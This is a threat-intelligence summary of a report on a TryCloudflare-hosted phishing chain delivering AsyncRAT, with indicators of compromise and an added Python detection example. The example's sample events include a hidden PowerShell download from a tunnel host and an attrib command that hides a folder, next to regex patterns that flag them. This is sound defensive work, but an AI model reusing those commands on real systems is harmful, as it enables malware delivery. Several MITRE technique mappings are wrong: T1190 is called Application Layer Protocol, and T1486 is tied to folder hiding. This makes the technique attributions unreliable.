This report details the monitoring of a malicious infrastructure, referred to as the “Cloudflare tunnel infrastructure,” that is used to deliver remote access trojans (RATs) such as AsyncRAT through a robust, multi-step infection chain. The phishing tactics and evasion strategies employed by the attackers, including malicious email attachments, LNK files, and obfuscation through Python scripts, are examined in detail.
Affected: Cybersecurity, Digital Infrastructure, Corporate Systems
Key points:
- Threat actors use the “Cloudflare tunnel infrastructure” (TryCloudflare tunnels) to host malicious files and deliver RATs.
- The infection chain has been operational since February 2024 and relies on multiple steps and complex strategies.
- Phishing emails, often disguised as invoices, serve as the primary initial access vector.
- Malicious LNK files are disguised as PDF shortcuts to evade detection.
- The report emphasizes the importance of monitoring for suspicious email attachments and provides a Sigma detection rule for this.
- Execution involves multiple obfuscated steps, including PowerShell and Python scripts used to install dependencies.
- The report emphasizes improving detection capabilities through Cyber Threat Intelligence (CTI) and tailored Sigma rules.
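The detection angle of the key points above, written out as an added example that is not code from the report or from Sekoia: three checks run over constructed Sysmon-style events (file-creation and process-creation records). The event fields, user paths and the trycloudflare host name are assumptions made for the example.

```python
import re

# Constructed Sysmon-style events (file creation and process creation); none come from the report.
SAMPLE_EVENTS = [
    {"kind": "file_create", "image": r"C:\Program Files\Outlook\OUTLOOK.EXE",
     "path": r"C:\Users\alice\Downloads\Invoice_2024-03.pdf.lnk"},
    {"kind": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c attrib +h +s "C:\Users\alice\AppData\Roaming\mslibrary"'},
    {"kind": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -c iwr https://constructed-host.trycloudflare.com/p -OutFile a.zip"},
    {"kind": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmd": r"notepad.exe C:\Users\alice\notes.txt"},
    {"kind": "file_create", "image": r"C:\Windows\explorer.exe",
     "path": r"C:\Users\alice\Desktop\Report.docx"},
]

def lnk_masquerading_as_document(ev):
    # A shortcut whose name carries a document extension directly before .lnk (the "PDF shortcut" lure).
    return ev["kind"] == "file_create" and bool(
        re.search(r"(?i)\.(pdf|docx?|xlsx?)\.lnk$", ev["path"]))

def attrib_hides_folder(ev):
    # attrib +h (optionally with +s) launched from a shell: the trick used to hide the install folder.
    return ev["kind"] == "process" and bool(
        re.search(r"(?i)\battrib\b[^&|]*\+h\b", ev["cmd"]))

def script_host_fetches_from_trycloudflare(ev):
    # A script host (PowerShell, cmd, python) retrieving content from a *.trycloudflare.com host.
    return ev["kind"] == "process" and bool(
        re.search(r"(?i)(powershell|pwsh|cmd|python)\.exe$", ev["image"])) and bool(
        re.search(r"(?i)https?://[^\s\"']*\.trycloudflare\.com", ev["cmd"]))

RULES = [lnk_masquerading_as_document, attrib_hides_folder, script_host_fetches_from_trycloudflare]

def match_events(events):
    """Return (rule name, event index) for every event that triggers a rule."""
    return [(rule.__name__, i) for i, ev in enumerate(events) for rule in RULES if rule(ev)]

if __name__ == "__main__":
    for name, i in match_events(SAMPLE_EVENTS):
        print(f"{name}: {SAMPLE_EVENTS[i]}")
```

Each check maps to one Sigma rule in practice; the benign notepad and .docx events show that the patterns do not fire on ordinary activity.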
MITRE Techniques:
- Phishing (T1566): Distribution of phishing emails disguised as invoices to deceive recipients.
- Application Layer Protocol (T1190): Use of malicious LNK files that abuse Windows shortcut handling.
- Execution via Command-Line Interface (T1059): Use of PowerShell to download and execute further payloads.
- Remote File Copy (T1105): Downloading additional files from compromised remote resources.
- Data Encrypted for Impact (T1486): Use of the ‘attrib’ command to hide the installation folder as an evasion technique.
Indicators of Compromise:
- [Domain] malawi-light-pill-bolt[.]trycloudflare[.]com
- [Domain] players-time-corresponding-th[.]trycloudflare[.]com
- [Domain] spaces-corner-notices-battery[.]trycloudflare[.]com
- [Domain] xi-if-grows-valued[.]trycloudflare[.]com
- [Domain] phvnmarch8787[.]duckdns[.]org
- [Hash – SHA-256] 0d8d46ec44e737e6ef6cd7df8edf95d83807e84be825ef76089307b399a6bcbb (mslibrary attachment)
Full Story: https://blog.sekoia.io/detecting-multi-stage-infection-chains-madness/